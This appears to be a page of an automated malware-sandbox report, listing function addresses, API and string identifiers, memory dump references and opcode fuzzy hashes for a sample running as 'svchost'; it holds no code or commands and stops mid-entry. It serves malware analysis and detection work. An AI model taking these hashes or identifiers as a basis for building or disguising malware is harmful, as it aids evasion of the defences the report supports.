                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 2102711378-639343689
                                      • Opcode ID: 39ae5b0d30208e6beee367f1dce86ef115d593417b4aabbe3785c0a493bca274
                                      • Instruction ID: c32cef99082807164055134b168046025e4e0467b766d65a8d99bb0d6316bd31
                                      • Opcode Fuzzy Hash: 39ae5b0d30208e6beee367f1dce86ef115d593417b4aabbe3785c0a493bca274
                                      • Instruction Fuzzy Hash: B6518B62E18646CAFB00DF65D8816BD33B0AF59794F501235DE1DAAA96DF3CE885C340
                                      Function 00007FF669AC73DC Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Window$Show$Rect
                                      • String ID: RarHtmlClassName
                                      • API String ID: 2396740005-1658105358
                                      • Opcode ID: 0429721503f3df6d0e4a2ebf805ed837eaba4dec232275f2850ff57e015bc3eb
                                      • Instruction ID: 9060eba71e0214539352599dad09e68cfdc8f867f13c8c4557e3c411344e312d
                                      • Opcode Fuzzy Hash: 0429721503f3df6d0e4a2ebf805ed837eaba4dec232275f2850ff57e015bc3eb
                                      • Instruction Fuzzy Hash: 50517C66A08786CAEB249F26E55477E77B0FB89B80F044035DE8E8BB55DF3CE0458700
                                      Function 00007FF669ACF708 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 98f483e2fb6a5dd7541989aead46f565bae59da7c077ff2ce5c4d400261fba0d
                                      • Instruction ID: 3020a960ec53b61085492703a2f69fdf0c2943d4b596a706082ee7e076e2cdd0
                                      • Opcode Fuzzy Hash: 98f483e2fb6a5dd7541989aead46f565bae59da7c077ff2ce5c4d400261fba0d
                                      • Instruction Fuzzy Hash: 7C21466590DA8BC0FB508F18A94417A77F5AB4AB88F24043ADD4DCF364CEBCE885D380
                                      Function 00007FF669ADAEF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4359b773fbba0af720932c525fc46cc875e6aefae9fbcebe7df6f6e6fb7e7f65
                                      • Instruction ID: 8d8309161b9364a484473bdad39fef4b5aa7ce283dde5a49e51e5855fcabf00f
                                      • Opcode Fuzzy Hash: 4359b773fbba0af720932c525fc46cc875e6aefae9fbcebe7df6f6e6fb7e7f65
                                      • Instruction Fuzzy Hash: 0FF03C61A19A82C2EF449F15F48427933B1AF88B90F485035ED4F8A764DE3CD4889710
                                      Function 00007FF669AE3500 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 27f67fe41e4c42298b33de1106483450569c9edced6e25817fd9ffe2d7ca504a
                                      • Instruction ID: e9a1c8fb2cc8144f8c77242978aaf8e063f9545dd5faaa23afc53e42447ceebd
                                      • Opcode Fuzzy Hash: 27f67fe41e4c42298b33de1106483450569c9edced6e25817fd9ffe2d7ca504a
                                      • Instruction Fuzzy Hash: BD81ED62E18692D9FB249F6588806BE77F0BB44B88F404135CE8E8B7A5DF3CE405E710
                                      Function 00007FF669AB2EBC Relevance: 7.7, APIs: 5, Instructions: 167filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                      • String ID:
                                      • API String ID: 2398171386-0
                                      • Opcode ID: 65a3e62c17f84a8c4717014c57e45f0d251850dd7ba6b3321ab7882d50137557
                                      • Instruction ID: 1aa3071c2ac4fd72bd3520980216b47b41acea92aa9556ecaf1ee2444ec2c10d
                                      • Opcode Fuzzy Hash: 65a3e62c17f84a8c4717014c57e45f0d251850dd7ba6b3321ab7882d50137557
                                      • Instruction Fuzzy Hash: 0261B122F18A46D9FB509FB5E4103BD33F1AF587A8F400631DE5D9A798DE389556C340
                                      Function 00007FF669AE2E74 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                      • String ID:
                                      • API String ID: 3659116390-0
                                      • Opcode ID: 0a83d180210566f70a241fa5ccc79bfb48bfd6b32f94f90474176552c64082a0
                                      • Instruction ID: b8ba8f8fb7222adaf3ced3076d0890ed2fc264c0f2911ce9bc4af92e58dfd8c6
                                      • Opcode Fuzzy Hash: 0a83d180210566f70a241fa5ccc79bfb48bfd6b32f94f90474176552c64082a0
                                      • Instruction Fuzzy Hash: 9251BF32A14A92C9E710CF65E4443AD3BB5FB48B98F048135DE4E9BBA9DF38D546C700
                                      Function 00007FF669AD1870 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocString
                                      • String ID:
                                      • API String ID: 262959230-0
                                      • Opcode ID: 791166c9e7769fd924f2fceee60fe6abbaa4398e3d0be2cfdad37150307341b9
                                      • Instruction ID: f9c32fad5936c135165f5cea412d65a2ff755ff1ad9232d171a20ba9b01de6ba
                                      • Opcode Fuzzy Hash: 791166c9e7769fd924f2fceee60fe6abbaa4398e3d0be2cfdad37150307341b9
                                      • Instruction Fuzzy Hash: 1F418C21A08A86C9EB189F6694503B932F1FF48BA4F584634EE6DCB7D5DE3CE1498300
                                      Function 00007FF669ADE354 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc
                                      • String ID:
                                      • API String ID: 190572456-0
                                      • Opcode ID: 8fca8475f1a047fc1a66f8c8c5381a27786512317fbf6558366a89078306a889
                                      • Instruction ID: 5bb04ec8dc9a23ffe7258807b2ab5de6813cc796d07901da502405d422fc4adb
                                      • Opcode Fuzzy Hash: 8fca8475f1a047fc1a66f8c8c5381a27786512317fbf6558366a89078306a889
                                      • Instruction Fuzzy Hash: F741C1A1B0AA42C2FE558F569804575B2F6BF44BA4F294535DE1ECF784EF3DE4098300
                                      Function 00007FF669AE4618 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _set_statfp
                                      • String ID:
                                      • API String ID: 1156100317-0
                                      • Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction ID: 5be477d0a12774543fa2795be74a54ba994cf07876e68b64988f1005ebbd53c4
                                      • Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
                                      • Instruction Fuzzy Hash: 1411C132E1CB8381FA681D64E4963B936E96F583A0E054634EE7E8F6D6CE2CA4407240
                                      Function 00007FF669ACF658 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                      • String ID:
                                      • API String ID: 3621893840-0
                                      • Opcode ID: cd00054fc0a760efd69cb354b7927d3aba3f438fb3718dab6eb4985a85afa278
                                      • Instruction ID: 3dc0e368b15894236edd0bb3e973118aa1198a6171b5cfb7e8ef49ad4f182677
                                      • Opcode Fuzzy Hash: cd00054fc0a760efd69cb354b7927d3aba3f438fb3718dab6eb4985a85afa278
                                      • Instruction Fuzzy Hash: 7CF04F21B28486C2F7109F20E859B7A2261FFE9705F941030ED4F89994DF2CD149D700
                                      Function 00007FF669AD5100 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: __except_validate_context_recordabort
                                      • String ID: csm$csm
                                      • API String ID: 746414643-3733052814
                                      • Opcode ID: faf4d979401c8addfc7157fbc9fd2a08f1151a638cb018da541ae3f31e7fc165
                                      • Instruction ID: 5dfdce4103406c7f20ead9863beec81244a4e618b55f6a4bf249ea1b02d2b9df
                                      • Opcode Fuzzy Hash: faf4d979401c8addfc7157fbc9fd2a08f1151a638cb018da541ae3f31e7fc165
                                      • Instruction Fuzzy Hash: 94819B62A08681CADB649F25909037D7AF0FB45B94F14A135EE8CCBB99CF2CD5998B40
                                      Function 00007FF669AD3DF0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                      • String ID: csm
                                      • API String ID: 2395640692-1018135373
                                      • Opcode ID: 3aa7e82573cc7413b43bcb952f9d5c3f043b7a25627dc997c918236a2edf52e9
                                      • Instruction ID: 0ddae92507e113805ed9f8899936773e4bcb9b84f49d17b4975c8e02fe1c5d2a
                                      • Opcode Fuzzy Hash: 3aa7e82573cc7413b43bcb952f9d5c3f043b7a25627dc997c918236a2edf52e9
                                      • Instruction Fuzzy Hash: 4E517F22B19606CADB148F15E844A7D73F1EB48B98F518135EE8A8F788DF7DE845C700
                                      Function 00007FF669AD7698 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: $*
                                      • API String ID: 3215553584-3982473090
                                      • Opcode ID: 684958d95b6ef02127df65c8ebde40a1dedc251177963d3d0aeec36b694d5983
                                      • Instruction ID: 1227915a2ab3ad1a5f29e997eb87e84562cc47820152802ce2a6dd72c4927440
                                      • Opcode Fuzzy Hash: 684958d95b6ef02127df65c8ebde40a1dedc251177963d3d0aeec36b694d5983
                                      • Instruction Fuzzy Hash: 79514CB290C652CAE76C8F38804437C3BF1EB15B18F542536CE4ADA399DF69E589C601
                                      Function 00007FF669AE0698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$StringType
                                      • String ID: $%s
                                      • API String ID: 3586891840-3791308623
                                      • Opcode ID: 8d0c1f2663cd4f65b6b7505cb43fb283e77da3f273d91b6f3c244599c6641088
                                      • Instruction ID: cc17eb224b0c8a02200f542f0e21a164136a9019d8fad9ae1613a2172ce563c8
                                      • Opcode Fuzzy Hash: 8d0c1f2663cd4f65b6b7505cb43fb283e77da3f273d91b6f3c244599c6641088
                                      • Instruction Fuzzy Hash: 04418D22B19B958AEB608F65D8006A933F1FB44BA8F484635EE5D8B7C4EF3CE4458744
                                      Function 00007FF669AD55B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: CreateFrameInfo__except_validate_context_recordabort
                                      • String ID: csm
                                      • API String ID: 2466640111-1018135373
                                      • Opcode ID: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                      • Instruction ID: 1255f1c1ab1ac373c36036910a39458f8135eadc32c41b14e30b1fa15fc2b791
                                      • Opcode Fuzzy Hash: c26bbf10109e0cf1fbdaac701120c7448e0257729b777b455f260bea3645797d
                                      • Instruction Fuzzy Hash: B5512636619745C6E620AF26A04126E77F4FB88B90F145534EF8D8BB96DF3CE4A4CB40
                                      Function 00007FF669AE32A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorFileLastMultiWideWrite
                                      • String ID: U
                                      • API String ID: 2456169464-4171548499
                                      • Opcode ID: f497630ebb3a047557ec047ebff14210b9b838039c74150178b8c3217214c8b1
                                      • Instruction ID: 8cf5237ddc072720857a23f0095383a0d72711191d41a9146a8679a0bddf0477
                                      • Opcode Fuzzy Hash: f497630ebb3a047557ec047ebff14210b9b838039c74150178b8c3217214c8b1
                                      • Instruction Fuzzy Hash: 87418F22618A82C2E7618F25E4447BA77B1FB88794F414031EE8DCB798DF7CD541D740
                                      Function 00007FF669AC896C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ObjectRelease
                                      • String ID:
                                      • API String ID: 1429681911-3916222277
                                      • Opcode ID: c6e9d11924edcf551ac3d2ba308f0c9a169416cc2dc9aaa6a4ff975c35cceb4a
                                      • Instruction ID: 7617911e6197b4341fef77a244e002bec1a01f1b3c1b6ff04f2fcf3172fc6d55
                                      • Opcode Fuzzy Hash: c6e9d11924edcf551ac3d2ba308f0c9a169416cc2dc9aaa6a4ff975c35cceb4a
                                      • Instruction Fuzzy Hash: E431293560874586EB088F12B91962BB7B1F78EFD1F408435ED4E87B14DE3CE4598B80
                                      Function 00007FF669ABE1DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Create$CriticalEventInitializeSectionSemaphore
                                      • String ID: Thread pool initialization failed.
                                      • API String ID: 3340455307-2182114853
                                      • Opcode ID: 0a0207b346ff271583a7a69f16d53c83212332797eaa9f7e9bab84b6fcdc6a15
                                      • Instruction ID: fa3cee9d9737d2747c49ddd200770f981bd44b0b180d76b504545faa49d8d304
